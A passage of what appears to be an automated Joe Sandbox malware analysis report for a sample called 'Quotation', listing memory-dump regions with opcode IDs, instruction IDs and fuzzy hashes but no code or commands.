                                                    • Instruction Fuzzy Hash: 1E2120726092589FCF01AF68E948B6F3BA1EB85311F00402AF8158B795CB34CE59CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74db5a76b1bcf85f1e46481435087ae8b73fd44e63510fdf7aab3e4282cac4d0
                                                    • Instruction ID: e4d938a69d81184af8fefff4a6043ba9b4d1f733ddf255321b555a78465edfd5
                                                    • Opcode Fuzzy Hash: 74db5a76b1bcf85f1e46481435087ae8b73fd44e63510fdf7aab3e4282cac4d0
                                                    • Instruction Fuzzy Hash: D4217770E05258DFDB05CFA5E994AEEBFB6EF49305F24806AE411B7290DB30DA41DB60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b097dd94de7ce37cef7a5db521cf01fbb9c013c013aaec20b0fb6694178d6d98
                                                    • Instruction ID: e09305bebdb8cb7a7cacfdcdee574e4d75e8a6e42e869184fbdfe3f269272b9c
                                                    • Opcode Fuzzy Hash: b097dd94de7ce37cef7a5db521cf01fbb9c013c013aaec20b0fb6694178d6d98
                                                    • Instruction Fuzzy Hash: 7E213E7090420D9FEB05EFBDE94069EBFF2FB89300F1085AAD0549B265E7704A068F81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ed67ae930afb532df8ce908a64a4f7c2376ec03977f0a2ed6ac34b82a6f2769
                                                    • Instruction ID: 0744a5d976ec112c76a0cdcda5f778fc0b88293f2518d6f603ade0a0fc2a6f9b
                                                    • Opcode Fuzzy Hash: 1ed67ae930afb532df8ce908a64a4f7c2376ec03977f0a2ed6ac34b82a6f2769
                                                    • Instruction Fuzzy Hash: 2C11A1353056219FCB159B2AE868A3EB7A6FFC57A13184079E816DB770CF31DC0287A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9c45e615f47455a91ec25e0bab0a247ecdcfa3383e8b14bc717bcd1dea39cc2
                                                    • Instruction ID: f6c39be2ca1ffe5dcd98e0bd28665e570eaa6f002a35ee8510d540a9029fe657
                                                    • Opcode Fuzzy Hash: f9c45e615f47455a91ec25e0bab0a247ecdcfa3383e8b14bc717bcd1dea39cc2
                                                    • Instruction Fuzzy Hash: 3F21B275C092198FCB04DFA9D9486EEBFF0FB0A310F10526AD819B2260EB315A85DB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103618648.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a5d000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                    • Instruction ID: 23e6dac334ff8edfd44b0bd5686d578ef41a694a1f4a44f496fa31965b3ce055
                                                    • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                    • Instruction Fuzzy Hash: 3911D376504240DFCB16CF10D9C4B16BF71FB94319F24C5A9DC490B656C336D85ACBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6299170414b12f09518325295115e7e08f208a54c0bcd7fca3519a1d053d4cd
                                                    • Instruction ID: d14b27216dff3f40f661a80f867a5eea7c34fc10cbfa0763f6859ac8dcd2b28d
                                                    • Opcode Fuzzy Hash: b6299170414b12f09518325295115e7e08f208a54c0bcd7fca3519a1d053d4cd
                                                    • Instruction Fuzzy Hash: ED014932B042246FCF128FA4B9046AF3BA6DBC9350B19402AF901C7691DA76CE029791
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe28579b94c1b1fd2b43f105b976e7d3da54e3b39b411198c4bc420ac9a07570
                                                    • Instruction ID: 44155af0ae3341193ae8c04028f713558da7c7ab67719e16fad9553527e8cbf9
                                                    • Opcode Fuzzy Hash: fe28579b94c1b1fd2b43f105b976e7d3da54e3b39b411198c4bc420ac9a07570
                                                    • Instruction Fuzzy Hash: 7F111F70D0020D9FDB45EFBDE94069EBBF2FB89301F1085BAD054AB265EB705A068F81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103660545.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a6d000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                    • Instruction ID: 7ed8ee1272b5059490abb86869bbafd5e9cf68d2ca60d7c48973c826a48079f2
                                                    • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                    • Instruction Fuzzy Hash: 29118B75A04284DFCB15CF10D9C4B15BBB2FB85314F24C6ADD84A4B656C33AD84ACF62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 920a9f52a1b176fcaa5ae36e548fe6eb83f787e91bd4ce3952e2f2d3fae0c6ec
                                                    • Instruction ID: 1587f8c23aaaee91d92b1b62f12494851bcb747dbf439cceada8dbfbc1387bc7
                                                    • Opcode Fuzzy Hash: 920a9f52a1b176fcaa5ae36e548fe6eb83f787e91bd4ce3952e2f2d3fae0c6ec
                                                    • Instruction Fuzzy Hash: C7116978D0820ADFDF01EFA8E8459EEBBB1FB4A300F10416AE810A7354D3305A16DF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa9244c4cb77ec2c1242f960bddb7727b6e8f1a1d67276d638bf856d5cae58c0
                                                    • Instruction ID: 40de4270ba0b766b0a1d4b7945408b0748521b6a0ae80213bf5a752bc20b2ab4
                                                    • Opcode Fuzzy Hash: aa9244c4cb77ec2c1242f960bddb7727b6e8f1a1d67276d638bf856d5cae58c0
                                                    • Instruction Fuzzy Hash: 8FF096313006204B97155A2EB858B2EB6DEEFC8B51355407AE919C7761EE22CD03C791
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a45e5549080db63db5a9f6728df46bf9928641e56245a711bd843ac28572002c
                                                    • Instruction ID: 6c871ab3d0e0ed8bd10eeb93fd06d938ceb48278189fcb176661b8f45c748764
                                                    • Opcode Fuzzy Hash: a45e5549080db63db5a9f6728df46bf9928641e56245a711bd843ac28572002c
                                                    • Instruction Fuzzy Hash: 18F068353002146FDB085BA5A864ABFB7DBEBCC760F148429F949C7355DE71CC1193A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59ab9a4cdeb8dc6d30f07c5267850d782c62250e9a052be42cba5121619fe918
                                                    • Instruction ID: 945fe7a2038868e13eeb09ffb29899cb632bdc6b6f9590824ca31885fe6a66e9
                                                    • Opcode Fuzzy Hash: 59ab9a4cdeb8dc6d30f07c5267850d782c62250e9a052be42cba5121619fe918
                                                    • Instruction Fuzzy Hash: 1DF096319041A49FCB018B69AC486EEBFF1EF89320F148567E518C7261C2318D55DB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28da7b6d25b6bb8a8283a52b276c74a2ba5e86ec694fd586ee2b76f00a72c12d
                                                    • Instruction ID: 34b475e38ab3998fb1796b553e69f0aef72558b99b22f69e3a2b01bcfc4fbd70
                                                    • Opcode Fuzzy Hash: 28da7b6d25b6bb8a8283a52b276c74a2ba5e86ec694fd586ee2b76f00a72c12d
                                                    • Instruction Fuzzy Hash: 6EE02635E54366CACB02E7F09C140EEBB34AEC7221B58459BC061371A0EB302259C3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 45d00b2758ec34af87b9ca7926e80489c25e878cfa3ac69762be39bd424790fa
                                                    • Instruction ID: 041e49943cb3b3d4820dda810fc97f2403eb53733f723827c21a12f96ad0d94f
                                                    • Opcode Fuzzy Hash: 45d00b2758ec34af87b9ca7926e80489c25e878cfa3ac69762be39bd424790fa
                                                    • Instruction Fuzzy Hash: 6DE0C23550C3A50FCF03E378FC6D4983F22A98121870486A7D4068A95BDFB42C89CB62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0d36aafd619de2f7efd0121f9b2a436e6937b058a83525f84fc832381a9e36d
                                                    • Instruction ID: cadcff72579d7f552519d570ba00b008b5b76ef7f05123bd900fe4f392f2191d
                                                    • Opcode Fuzzy Hash: c0d36aafd619de2f7efd0121f9b2a436e6937b058a83525f84fc832381a9e36d
                                                    • Instruction Fuzzy Hash: CED05E32E2022B97CB00EBA5EC048EFF738EED6661B908626D52537140FB713659C7E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                    • Instruction ID: 10178f141ce034654a6fb891788f9bd4b6a68a206a56e6d8c4cfc91bc880a1c2
                                                    • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                    • Instruction Fuzzy Hash: D1C08C3320E1382AA234108F7C40EA3BB8DC3C13B4A210137FA2CD3640AC429C8401F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62a60970343f31cd08cfecdd4dbd972c33754037086d278390745d06159c3304
                                                    • Instruction ID: b58b545b349b0a3f1c0ba1508f7fa129eb56e26450d87f60946a7d73b55f3cf8
                                                    • Opcode Fuzzy Hash: 62a60970343f31cd08cfecdd4dbd972c33754037086d278390745d06159c3304
                                                    • Instruction Fuzzy Hash: A9D0677BB40008AFCB049F98EC44ADDF776FB98221B448117E915A3264C6719965DB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4662228e88517f52195b0322a3a74bcee9e822d2f46ee7381eeb386c5bb07810
                                                    • Instruction ID: 6475a19d81fa665dcb226080c6f8f9376dab5b66123b5896311cd512ce939002
                                                    • Opcode Fuzzy Hash: 4662228e88517f52195b0322a3a74bcee9e822d2f46ee7381eeb386c5bb07810
                                                    • Instruction Fuzzy Hash: 7EC0123101430C4BDA01F7BDFD59699331ABAC05107409621A4090965EEF743D458B92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: y
                                                    • API String ID: 0-4225443349
                                                    • Opcode ID: 98ca3a50502edb099754bac4408960518239ed5778b5d1f1e91cac39146c015d
                                                    • Instruction ID: 5190fa549018f1acfa31fa3b504c886f22169b3822a78a8d7e93bd68a3b398a4
                                                    • Opcode Fuzzy Hash: 98ca3a50502edb099754bac4408960518239ed5778b5d1f1e91cac39146c015d
                                                    • Instruction Fuzzy Hash: 00516670D04228CFEB14EFA9E4847EEBBB2BB89300F248139D414BB695C7719982CF54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ad55ca3f5f448118f9e8c598f92bac42d33ec13eed684fc0453bf0e5a0c79ef
                                                    • Instruction ID: 595a3bd6757c17cc19f71a5eb407191cb7b088c7d2e818390c04adcd826d4b80
                                                    • Opcode Fuzzy Hash: 7ad55ca3f5f448118f9e8c598f92bac42d33ec13eed684fc0453bf0e5a0c79ef
                                                    • Instruction Fuzzy Hash: 9B5225B2501F46CFD716CF29EE8C39D7BB1FB45318B90460AC6916B2A0E7B4654ACF84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7352d53b3a3e1cdf424b1b1df9ee8567fa6549b9fef5a9eb56782128531d02cc
                                                    • Instruction ID: 6ff09e7152c5371de889b21cd6a50b319be0149c0dfc5bdab8a06a936015e8b1
                                                    • Opcode Fuzzy Hash: 7352d53b3a3e1cdf424b1b1df9ee8567fa6549b9fef5a9eb56782128531d02cc
                                                    • Instruction Fuzzy Hash: 29F10A31A00349CFDB18DFAAC948B9DBFF1BF88314F158559E445AB2A5DB70E946CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ea1493d1553f6a2000f785aabf3538db68dd8469584c768f49af98a627f71fa
                                                    • Instruction ID: 6766c9d146be2839de60dfea7f05a1fe9c0922f41a4175df4d060a515ccd01ac
                                                    • Opcode Fuzzy Hash: 4ea1493d1553f6a2000f785aabf3538db68dd8469584c768f49af98a627f71fa
                                                    • Instruction Fuzzy Hash: 0DC19174E00218CFEB14DFA9D954B9DBBB2BF89300F2481A9D809AB355DB359E81CF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef64a4fdd5a1b21ca4e5fde000a9160a1f4433b93a6af0407d5976528d2ba62e
                                                    • Instruction ID: 6fcaac1fadc843051a024a81604629411c0fc3f3dcb7c5f2773b165927fde41a
                                                    • Opcode Fuzzy Hash: ef64a4fdd5a1b21ca4e5fde000a9160a1f4433b93a6af0407d5976528d2ba62e
                                                    • Instruction Fuzzy Hash: 79A16F32E002469FCF19DFB5D84859EBBB2FF85300B25857AE845AB261DB31E955CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103379100.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5e0000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e2c3d717a6dbfca9c6f2def378259797a79e8ec0cf37e241367d780f0e5e902
                                                    • Instruction ID: a415fa737e98b2ae52696627640b6939a5af5ee0a3948b79fb7c3408b20773ae
                                                    • Opcode Fuzzy Hash: 0e2c3d717a6dbfca9c6f2def378259797a79e8ec0cf37e241367d780f0e5e902
                                                    • Instruction Fuzzy Hash: 62C1E4B2901B468AE712CF65EE4C38D7BB1BB89324B50460BD2612F2F4DBB5154ACF84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35158bc26a98f74a58c5212d0db15268853d479436d5678e3abef1a09fe3c3d6
                                                    • Instruction ID: 155f4f06f6ce9702a1130590f12ab3c2d941815c1587dca5b4b077b96ca55014
                                                    • Opcode Fuzzy Hash: 35158bc26a98f74a58c5212d0db15268853d479436d5678e3abef1a09fe3c3d6
                                                    • Instruction Fuzzy Hash: 9E511470D04228CFDB15EFA8E4847AEBBB1FB49301F248139E415ABA95C7759C82CF54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd12f41f142a05841c45e5b0e20dd8187745e6c31430de29e94ee6843dd8decf
                                                    • Instruction ID: 46938f790d48be557f0c287cf7c5882bfce5282e1ef8630fbcb87deaa5bff4db
                                                    • Opcode Fuzzy Hash: dd12f41f142a05841c45e5b0e20dd8187745e6c31430de29e94ee6843dd8decf
                                                    • Instruction Fuzzy Hash: 6751E270D04228CFDB14EFA8E484BAEBBB1FB49301F208139E415BBA95C7759982DF54